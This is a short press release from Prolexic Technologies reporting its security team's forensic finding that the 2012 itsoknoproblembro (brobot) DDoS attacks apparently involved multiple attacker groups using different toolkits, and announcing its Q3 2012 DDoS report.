Prolexic Technologies believes the recent spate of DDoS attacks should not be attributed to just one group/individual or toolkit, as has been widely assumed.
The bot toolkit discovered to be responsible for the majority of these attacks is a PHP-based suite known as itsoknoproblembro; the infected hosts are known as brobots. However, post forensic attack analysis of a number of infected hosts conducted by the Prolexic Security Engineering & Response Team (PLXsert) point to multiple malicious actors participating in the crippling DDoS attacks using individualized toolkits and tactics. The PLXsert team found:
* Techniques of exploitation and defacements varied. In some instances hosts were taken over and defaced. In others, files were dropped and scans were setup to identify additional targets. This leads PLXsert to believe that the initial infections were performed by multiple groups (or multiple individuals).
* Forensics showed that different toolkits were used to maintain or gain access to infected hosts.
* A blend of attack scripts and different techniques during each observed campaign points to the possibility of multiple, well-organized groups.
* PLXsert was able to gain visibility into some machines and was able to prove persistence of infection going back to May 2012. The difficulty of cleanup is directly related to the number of different toolkits used and the high number of back doors installed. This supports PLXsert’s hypothesis that multiple groups/individuals used different tactics.
“A blend of attack scripts and different techniques used in each campaign is another pointer to the likelihood that multiple, well-organized groups or individuals were behind these attacks,” said Stuart Scholly, president at Prolexic. “As we approach the critical online holiday shopping period, there is no doubt that attackers have armed themselves with advanced toolkits capable of generating amplified and sophisticated DDoS floods.”
Prolexic will issue its Q3 2012 Global DDoS Attack Report in mid-October. The report will include a detailed case study on the itsoknoproblembro toolkit as well as data from the recent high profile DDoS attacks.